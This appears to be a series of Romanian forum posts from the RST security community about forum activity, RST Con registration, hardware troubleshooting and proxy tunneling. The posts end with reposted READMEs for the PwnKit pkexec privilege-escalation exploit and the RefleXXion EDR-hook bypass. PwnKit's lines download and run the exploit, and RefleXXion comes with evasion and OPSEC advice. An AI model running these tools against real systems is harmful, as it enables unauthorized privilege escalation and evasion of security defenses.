Nytro

Ideea e ca RST nu e singurul forum care nu prea mai merge. Nici un forum nu mai merge. Si nu ma refer doar la cele de IT, forumuri de orice fel. Una dintre "probleme" o reprezinta chiar aceste porcarii (din punctul meu de vedere) de grupuri de Facebook. Sunt usor de accesat si toata lumea isi da cu parerea, doar ca parerile sunt de multe ori idioate (e.g. grupuri de masini). In plus, e haos, nu e nici o organizare, sunt posturi aruncate la gramada fara nici un sens si greu de urmarit. Avem pagina de Facebook dar nu o folosim ca nu ajuta prea mult. Mie mi-ar placea sa se intoarca lumea la forumuri, mie imi plac mult si gasesc rapid ce am nevoie (e.g. Softpedia). Ar mai fi si acele grupuri de WhatsApp, Telegram sau Discord unde povestea e aceeasi. Daca ai o intrebare totul depinde de "persoanele care sunt pe faza". Pe un forum se pot vedea ulterior si practic toate postarile. Mai exact nu imi dau seama ce am putea face ca nu putem schimba mentalitati. Noi ne facem treaba si suntem pe baricade. RST Con #2 e o idee prin care vreau sa readuc activitate pe forum. Deci, cineva interesat de o prezentare? De creat exercitii CTF?

Nice, nu le stiam pe toate!

Vezi prima metoda si nu te uita la celelalte: https://www.cocosenor.com/articles/computer/3-ways-to-unlock-bios-password-on-lenovo-thinkpad-laptop.html Cauta "Thinkpad l540 bios password" si gasesti si alte idei, dar nu ai garantia ca va merge ceva (simplu).

Pentru anumite modele mergea sa generezi o parola din codul de eroare. Dar depinde de la model la model. Sunt sanse destul de mari sa nu mearga nimic. Care e ordinea la boot menu?

Descarca PDF, Introductiom to Penetration Testing, ar trebui sa fie ok pentru inceput.

Ah, da, mentionasei. Da, e in regula, nu ai de ce sa iti faci griji.

Salut, nu se poate, doar sa nu descarci ceva de pe el si sa executi la tine. Erau ceva atacuri posibile, vezi doar sa ai ultima versiune de client RDP (banuiesc ca cel de la Microsoft, e OK).

Online proxy daca e de ajuns. https://hide.me/en/proxy si o gramada altele. Dar nu poti face prea multe. Solutii in teorie exista, dar presupun sa treci tot prin acel proxy.

E clar, nu are rost sa te implici in astfel de lucruri. Cat despre lucrurile "neortodoxe" pe care le fac oamenii, partea tehnica nu e probabil intotdeauna cea care duce la ei. Adica degeaba te ascunzi in 30 de feluri cat timp, de exemplu, tepuiesti pe cineva sa iti trimita bani in contul bancar. Nu prea va inteleg, nu va vad cu Lamborghini in 1-2 ani sa ziceti ca merita riscul, va bagti in porcarii fara sa stiti asta si fara ca macar sa merite.

Daca acel proxy e singura "deschidere" catre Internet nu prea ai cum sa o ocolesti: Nu iti merge nici un website? Sau anumite site-uri sunt blocate? Ai conexiuni interne accesibile?

Nu am intalnit asa ceva insa se pare ca e destul de comuna si exista solutii publice printre care https://www.kapilarya.com/the-user-profile-service-failed-the-sign-in-windows-10 si probabil multe altele. Incearca iar daca nu merge, solutia cea mai simpla ar fi o reinstalare.

Bine ai revenit, esti pe drumul cel bun.

Salut, e posibil sa nu mearga. Daca traficul catre Internet e deschis DOAR prin acel proxy, probabil nu ai cum sa il ocolesti. Dar, ce poti incerca sa faci (nu stiu daca merge) e sa faci un tunel prin acel proxy. HTTP tunnrling. Cel mai probabil un VPN pe portul 443 nu ar merge, dar poti incerca.

Din cate imi aduc aminte exista instructiuni la nivel de procesor care permit anumite operatiuni pe BIOS precum citirea si posibil scrierea unor setari. Rescrierea codului nu cred ca se poate face pentru ca ma astept ca orice BIOS modern sa accepte doar firmware semnat. Bootkit-ul nu suprascrie nimic in legatura cu BIOS-ul ci ceea ce se intampla la boot. Mai exact, dupa ce BIOS-ul face cateva verificari hardware va executa instructiunile disponibile la o anumita adresa unde de obicei se afla bootloader-ul sistemului de operare. Un bootkit va suprascrie acea zona cu altceva iar un antivirus poate scana acea zona de memorie sa verifice daca e totul in regula. Probabil regulile de scanare sunt atat bazate pe semnaturi de bookits cat si verificari de semnaturi (bootloader signed).

Events: Linkedin: https://www.linkedin.com/events/rstcon-26894664423269556224/about/ Facebook: https://www.facebook.com/events/312925840851762/ Inregistrare (Zoom): - Prima zi (17 martie): https://us02web.zoom.us/webinar/register/7716432416217/WN_ihd6n-QbT9SmhUFEEiOouw - A doua zi (18 martie): https://us02web.zoom.us/webinar/register/8216433285169/WN_FvmdS_d2SJSo-OJpFaNRMA

Am publicat informatiile necesare (aproape complet) pe site: https://rstcon.com/ Asteptam: 1. Propuneri pentru prezentari (Call for Papers) 2. Donatii pentru premiile concursului CTF 3. Exercitii pentru concursul CTF Daca ne poate ajuta cineva, astept un mesaj privat sau un email la contact@rstcon.com

Ce format are acel stick? E USB3.0? Portul e USB2.0? Daca il folosesti normal sunt probleme cu el? PS: Nu am idee care e problema, si eu am avut de-a lungul timpului o gramada de probleme cu stick-urile.

Poti folosi un <input> cu "id" ca sa citesti acel numar: <input type="text" id="nr"> <script>var nr = document.getElementById("nr").value;</script> Si ca sa le afisezi poti folosi un div: <div id="afisare"></div> var suma = 0; // Ca sa o calculezi var afisare = document.getElementById("afisare"); for(var i = 0; i < n; i++) { suma += i; afisare.innerHTML = afisare.innerHTML + i + "<br>"; } Ceva de genul ca idee, probabil sunt probleme in ce am scris.

Corect. Unii mai sugereaza procedurile stocate dar nu va luati dupa ei.

Bun venit!

Momentan am deschis inregistrarile: Evenimentul se va desfășura folosind platforma Zoom. Pentru înregistrare vă rugăm să folosiți următoarele: - Prima zi (17 martie): https://us02web.zoom.us/webinar/register/7716432416217/WN_ihd6n-QbT9SmhUFEEiOouw - A doua zi (18 martie): https://us02web.zoom.us/webinar/register/8216433285169/WN_FvmdS_d2SJSo-OJpFaNRMA Voi reveni cu info detaliate referitoare la call for papers si CTF si pe site. Asteptam propuneri pentru prezentari. Cred ca e o ocazie ideala: online, cerintele nu sunt (momentan) foarte stricte...

Voi reveni cu mai multe detalii in curand, daca sunt persoane care ne pot ajuta (challenges sau donatii) astept un PM.

Buna intrebare: 50 de minute. Nu trebuie sa fie exact, fiecare prezentare are alocate 60 de minute inclusiv intrebari. Doar sa nu dureze prea putin, 20-30 de minute de exemplu ca ramanem in pauza prea mult. Voi reveni in curand cu mai multe detalii, tot fac teste cu Zoom, am incercat Zoom Events care pare fancy si e cam porcarie, deci tot la webinar cred ca ramanem.

PwnKit Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation Usage Should work out of the box on Linux distributions based on Ubuntu, Debian, Fedora, and CentOS. wget https://github.com/ly4k/PwnKit/raw/main/PwnKit chmod +x ./PwnKit ./PwnKit Example Technical Details https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 References https://github.com/arthepsy/CVE-2021-4034/ Sursa: https://github.com/ly4k/PwnKit

Introduction RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks, it first collects the syscall numbers of the NtOpenFile, NtCreateSection, NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array. After that, there are two techniques that the user can choose to bypass the user-mode hooks. Technique-1, reads the NTDLL as a file from C:\Windows\System32\ntdll.dll. After parsing, the .TEXT section of the already loaded NTDLL (where the hooks are performed) in memory is replaced with the .TEXT section of the clean NTDLL. In Technique-2, NTDLL reads as Section from KnownDlls, \KnownDlls\ntdll.dll. (beacuse DLL files are cached in KnownDlls as Section.) After parsing, the .TEXT section of the already loaded NTDLL (where the hooks are performed) in memory is replaced with the .TEXT section of the clean NTDLL. The detailed flow of the methodology and all techniques is given below. How to Use You can open and compile the project with Visual Studio. The whole project supports x64 architecture for both Debug and Release modes. The RefleXXion-EXE solution generates the EXE for PoC purpose. If you want to understand how the project works step by step, it will make your job easier. Main function contains Technique1 and Technique2 functions definations. Comment one of them and compile. Do not use both functions at the same time. The RefleXXion-DLL solution generates the DLL that you inject into the process you want to bypass the user-mode hooks for NTDLL. At the beginning of the main.cpp file, there are definitions of which technique to use. You can choose one of them and compile it. Do not set all values at the same time, set only the one technique you want. Example configuration is given below. // Techniques configuration section #define FROM_DISK 1 // If you set it to 1, the Technique-1 will be used. For more information; https://github.com/hlldz/RefleXXion #define FROM_KNOWNDLLS 0 // If you set it to 1, the Technique-2 will be used. For more information; https://github.com/hlldz/RefleXXion Operational Usage Notes & OPSEC Concerns RefleXXion currently is only supports for x64 architecture. RefleXXion only unhooks NTDLL functions, you may need to unhook other DLLs (kernel32.dll, advapi32.dll etc.) as well. For this, you can easily edit the necessary places in the project. The RefleXXion only uses the RWX memory region when overwriting the .TEXT section process starts. For this process a new memory reginon is not created, the existing memory region (the TEXT section of the NTDLL that is already loaded) is RWXed and then converted to RX. ULONG oldProtection; ntStatus = NtProtectVirtualMemory(NtCurrentProcess(), &lpBaseAddress, &uSize, PAGE_EXECUTE_READWRITE, &oldProtection); memcpy()... ntStatus = NtProtectVirtualMemory(NtCurrentProcess(), &lpBaseAddress, &uSize, oldProtection, &oldProtection); P.S. The RefleXXion invokes the NtProtectVirtualMemory API over the cleanly installed NTDLL. It uses the CustomGetProcAddress function for this because the clean NTDLL is not in the InLoadOrderModuleList even though it is loaded into memory. So a solution like here (https://stackoverflow.com/questions/6734095/how-to-get-module-handle-from-func-ptr-in-win32) will not work. That's why the custom GetProcAddress function exists and is used. You can load RefleXXion DLL from disk to target process. You may not prefer a run like this for sensitive work such as a Red Team operation. Therefore, you can convert the RefleXXion DLL to shellcode using the sRDI project or integrate the RefleXXion code into your own loader or project. Even if NTDLL (as file or as section) is reloaded to the injected process, it does not remain loaded. RefleXXion close all opened handles (file & section handles) for own processes. Special Thanks & Credits Research & PoC for collecting clean system calls with LdrpThunkSignature by Peter Winter-Smith, @peterwintrsmith. EDR Parallel-asis through Analysis, https://www.mdsec.co.uk/2022/01/edr-parallel-asis-through-analysis/ Windows 10 Parallel Loading Breakdown by Jeffrey Tang. https://blogs.blackberry.com/en/2017/10/windows-10-parallel-loading-breakdown https://stackoverflow.com/questions/42789199/why-there-are-three-unexpected-worker-threads-when-a-win32-console-application-s Shellycoat by Upayan, @slaeryan. https://github.com/slaeryan/AQUARMOURY/tree/master/Shellycoat Sursa: https://github.com/hlldz/RefleXXion